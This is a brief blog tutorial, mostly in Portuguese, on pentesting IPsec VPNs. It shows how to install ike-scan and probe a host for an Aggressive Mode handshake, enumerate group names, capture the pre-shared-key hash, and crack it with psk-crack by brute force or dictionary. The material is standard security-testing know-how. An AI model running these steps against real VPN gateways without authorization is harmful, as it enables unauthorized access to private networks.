Sunday, June 9, 2019

Pentesting VPN's ike-scan

Para este método, usaremos as ferramentas ike-scan e ikeprobe. Primeiro, instalamos o ike-scan clonando o repositório Git:

clone git https://github.com/royhills/ike-scan.git


Como fazer isso...
Navegue até o diretório onde o ike-scan está instalado.
Instale o autoconf executando o seguinte comando:
apt-get install autoconf
Execute o autoreconf --install para gerar um arquivo .configure.
Execute ./configure.
Execute make para construir o projeto.
Execute make check para verificar o estágio de construção.
Execute make install para instalar o ike-scan.
Para varrer um host para um handshake no modo Agressivo, use o seguinte comando:
   ike-scan x.x.x.x –M -A

Às vezes, veremos a resposta depois de fornecer um nome de grupo válido, como vpn:

ike-scan x.x.x.x –M –A id = vpn

Para ver a lista de todas as opções disponíveis, podemos executar o seguinte comando:
ike-scan -h


Podemos até mesmo forçar os nomes dos grupos usando o seguinte link: https://github.com/SpiderLabs/groupenum.
Aqui está o comando:
./dt_group_enum.sh x.x.x.x groupnames.dic



Cracking the PSK

  1. Adding a –P flag in the ike-scan command will show a response with the captured hash.
  2. To save the hash, we provide a filename along with the –P flag.
  3. Next, we can use psk-crack with the following command:
psk-crack –b 5 /path/to/pskkey
-b is brute force mode and length is 5.
  1. To use a dictionary-based attack, we use the following command with -d flag to input the dictionary file:
psk-crack –d /path/to/dictionary /path/to/pskkey


In Aggressive mode, the authentication hash is transmitted as a response to the packet of the VPN client that tries to establish a connection tunnel (IPSec). This hash is not encrypted and hence it allows us to capture the hash and perform a brute force attack against it to recover our PSK.

This is not possible in Main mode, as it uses an encrypted hash along with a 6-way handshake, whereas Aggressive mode uses only a 3-way handshake.

No comments:

Post a Comment

Remote Hybrid and Office work